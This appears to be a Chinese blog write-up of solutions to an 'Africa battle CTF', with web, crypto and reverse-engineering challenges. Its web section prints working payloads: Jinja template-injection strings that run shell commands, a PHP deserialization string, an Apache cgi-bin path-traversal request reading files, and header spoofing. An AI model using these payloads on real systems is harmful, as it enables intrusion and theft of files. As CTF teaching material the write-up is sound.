lvzhouhang
0%

Africa battle CTF

发表于 更新于 分类于
本文字数: 6.3k 阅读时长 ≈ 6 分钟

WEB

Civilization

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
require("./flag.php");
if(isset($_GET['source'])){
    highlight_file(__FILE__);  
}
if(isset($_GET['ami'])){
    $input = $_GET['ami'];
    $cigar = 'africacradlecivilization';
    if (preg_replace("/$cigar/",'',$input) === $cigar) {
        africa();
    }
}
include("home.html");
?>

?source得到这个,这个只用双写就可以绕过。

payload:

1
?ami=africacradlecafricacradlecivilizationivilization

Cobalt Injection

在源代码里有

<!-- IP?capital=Benin -->

可知存在ssti模板注入。没有过滤。

payload:

1
?capital={{%27%27.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat flag.txt').read()}}

当然看别人的WP,要长脑子了

1
?capital={{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}

#request.application:表示当前请求的应用程序对象。

1
?capital={{().__class__.__base__.__subclasses__()[354]('cat flag.txt', shell=True, stdout=-1).communicate()[0].strip()}}

这个还没搞明白,搞明白了再回来修改。

访问?source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
    include("flag.php");

    if(isset($_GET['source'])){
        highlight_file(__FILE__);
    }
    
    class africa {
        var $boknn;
        var $du;
    }
   
    if (isset($_GET['fa'])) {
        $vodoo = $_GET['fa'];
       
        $fa = unserialize($vodoo);
       
        if ($fa) {
            $fa->du=$flag;
            if ($fa->du === $fa->boknn)
                echo "Congratulation! You've got the best interpretation: <b>".$fa->du."</b>";
            else
                echo "Oh no...";
        }
        else echo "you dey smoke igbo?";
    }
    include("home.html");

?>

反序列化,只要将传入的fa值和$du相等就可以输出flag。

payload:

1
?fa=O:6:"africa":2:{s:5:"boknn";N;s:2:"du";R:2;}

其中,boknn的值为NULL,du的值通过R引用了编号为2的值,

boknn的编号就为2。

具体的可以看:https://wiki.wgpsec.org/knowledge/ctf/php-serialize.html

Own reality

真是让我长见识了。

首先是.git泄露

用wget将网站下载下来

`wget http://chall.battlectf.online:8082/.git/ -mirror

使用 --mirror 选项你可以下载整个站点,包括它的目录结构。

然后用git reflog查看历史版本,之后用git cherry-pick ‘你想要恢复的’

会出来一个flag.txt,尾部有

1
.__..._..__...._.___._...___._...__.__...__.._._._....__._._._..._...__..____.__._._._._.__.___..__._.__.__.___..__.____.___.___.__.___.._._____.__..._..__._.._.___._...___..__._._____..__..__..___.....__._...__.._._.__.._._.__...._..__._....___.._.__..._...__._....__..._..__.___.__.._._.__.._._..__.._..__..__..__..__...__._._.__...._..__..._..__..__.__..__..__..._..__.._...__...__.__...__.__...._..__.__..__..__...__..__..__.._...__.___._____._

二进制转换为字符就是flag

It shock you

先用whatweb看网站,

可以看到apache的版本,去网上找相对应的漏洞能找到,目录穿越

POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/flag.txt HTTP/1.1
Host: chall.battlectf.online:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=6ae53a7d294917d5fdac2db41c97b477
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 06 Jun 2023 14:53:49 GMT
If-None-Match: "b6d-5fd772fd55940"

Africa

Warning: This site is only for africa people.

在bp中将User-Agent改为africa

Warning: Go away! Attacker! This page is only for local client!

X-Forwarded-For伪造127.0.0.1

Warning: I don't trust users who are not from battlectf.online

Referer绕过得到flag。

Crypto

Back To Origin

埃及象形文

https://girlstart.org/wp-content/uploads/2020/05/Decoding-Hieroglyphics.pdf

可以参考上面的链接

Blind

https://gchq.github.io/CyberChef/

首先是magic解码,然后 braille,解码得到flag

ROCYOU

factordbyafu分解不出来,看别人的博客知道有ROCA漏洞,可以从公钥中提取私钥

工具:

https://gitlab.com/parfaittolefo23/astuces-et-write-up-ctf/-/blob/main/Tools/neca

一开始运行要给权限

可以用在线的rsa解密工具:https://www.dcode.fr/chiffre-rsa

1
2
p=127801155916875524149457561567678575565270601000365665873572024750823913157383
q=113917064871970833547038329106470040388258358281464605006613652518914797349747

goose

首先给了5个随机数,然后将falg的每个字符通过res = (2*a*pow(ord(x),4)+b*pow(ord(x),3)+c*pow(ord(x),2)+d*ord(x)+e)进行加密。

flag的前几个字符是知道的,可以列方程组计算一下a,b,c,d,e的值

1
2
3
4
5
6
184473632*a+941192*b+9604*c+98*d+1*e=1245115057305148164
177058562*a+912673*b+9409*c+97*d+1*e=1195140205147730541
362127872*a+1560896*b+13456*c+116*d+1*e=2441940832124642988
362127872*a+1560896*b+13456*c+116*d+1*e=2441940832124642988
272097792*a+1259712*b+11664*c+108*d+1*e=1835524676869638124
208120802*a+1030301*b+10201*c+101*d+1*e=1404473868033353193

解得:

1
2
3
4
5
a=6709636436
b=7748795321
c=7386429784
d=62359624
e=5008041292

然后写代码爆破:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
flag = ''
a=6709636436
b=7748795321
c=7386429784
d=62359624
e=5008041292
tab=[1245115057305148164, 1195140205147730541, 2441940832124642988, 2441940832124642988, 1835524676869638124, 1404473868033353193, 272777109172255911, 672752034376118188, 324890781330979572, 3086023531811583439, 475309634185807521, 1195140205147730541, 2441940832124642988, 1578661367846445708, 2358921859155462327, 1099718459319293547, 773945458916291731, 78288818574073053, 2441940832124642988, 1578661367846445708, 1099718459319293547, 343816904985468003, 1195140205147730541, 2527132076695959961, 2358921859155462327, 2358921859155462327, 1099718459319293547, 72109063929756364, 2796116718132693772, 72109063929756364, 2796116718132693772, 72109063929756364, 2796116718132693772, 3291439457645322417]

def encrypt(x):
    return (2*a*pow(ord(x),4)+b*pow(ord(x),3)+c*pow(ord(x),2)+d*ord(x)+e)
for val in tab:
    for i in range(32,126):
        if(encrypt(chr(i))==val):
            flag+=chr(i)
            print(flag)

RE

seyi

ida64位打开,flag在getshell里面。

welcome

重点就是这个,

add就是加,

xor就是异或。

很简单的一个表达式。

1
2
3
4
5
6
7
8
from Crypto.Util.number import *
a = 0x522D1B20F6
b = 0x1EE2EEEE
c = a+b
d = 0x0AA84AAA
flag = c^d
flag = long_to_bytes(flag)
print(flag)

Infinity

找到汇编代码里所有的push,然后将值转换一下

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
a=	[p64(0x5F4F7572),
	p64(0x6C654354),
	p64(0x467B4265),
	p64(0x796F6E64),
	p64(0x62617474),
	p64(0x47616C61),
	p64(0x7869657D)]
for c in a:
	print(c)

1
2
3
4
5
6
7
b'ruO_\x00\x00\x00\x00'
b'TCel\x00\x00\x00\x00'
b'eB{F\x00\x00\x00\x00'
b'dnoy\x00\x00\x00\x00'
b'ttab\x00\x00\x00\x00'
b'alaG\x00\x00\x00\x00'
b'}eix\x00\x00\x00\x00'

然后将这些反转一下删掉多余的东西

1
2
3
4
5
6
7
_Our
leCT
F{Be
batt
Gala
xie}
yond

最后将这些拼接一下,battleCTF{Beyond_OurGalaxie}

babyrev

用ida打开,查询字符串能发现qpiiatRIU{Pvqp_Ugt3_UDDS_Stn_d0D!_85864r1277qu8195pqqtp6540494pr46},然后凯撒解密得到flag

checker

和上一题基本上差不多

gfyyqjHYK{Flg4_d0z_i3d_xr0p3_1lg0?}然后凯撒解密